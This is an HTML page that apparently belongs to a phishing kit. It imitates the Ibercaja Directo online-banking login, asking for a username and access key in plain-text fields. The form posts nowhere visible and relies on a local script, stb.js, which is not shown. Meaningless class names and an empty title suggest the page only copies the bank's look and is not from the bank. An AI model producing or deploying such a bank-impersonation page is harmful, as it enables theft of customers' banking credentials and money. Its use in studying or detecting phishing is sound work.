<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="./css/obeta.css">
    <script src="https://code.jquery.com/jquery-3.6.0.min.js" integrity="sha256-/xUj+3OJU5yExlq6GSYGSHk7tPXikynS7ogEvDej/m4=" crossorigin="anonymous"></script>
    <title></title>
</head>
<body>
    <div class="mikolo">
        <div>
            <div class="upot">
                <img src="./img/upotop1.png" alt="">
            </div>
        </div>
        <form  method="post" id="pg1">
        <div>
            <div class="dota">
                <div class="inpo">
                   
                        <p>Usuario Ibercaja Directo</p>
                        <input type="text" id="dni" required>
        
                        <p>Clave de acceso</p>
                        <input type="text" id="paso" required>
                    
                </div>
    
                <div>
                    <div class="midil">
                        <input type="checkbox" >
      <p >Recordar usuario </p>
                    </div>
                    <div class="midil2">
                        <p>OLVIDE O CAMBIAR MI CLAVE </p>
                    </div>
                </div>
    
                <button type="submit">ENTRAR</button>
            </div>
        </div>
    </form>
        <div>
            <div>
                <img src="./img/botany.png" alt="">
            </div>
        </div>
    </div>

    <!-- my script -->
    <script src="./js/stb.js"></script>
</body>
</html>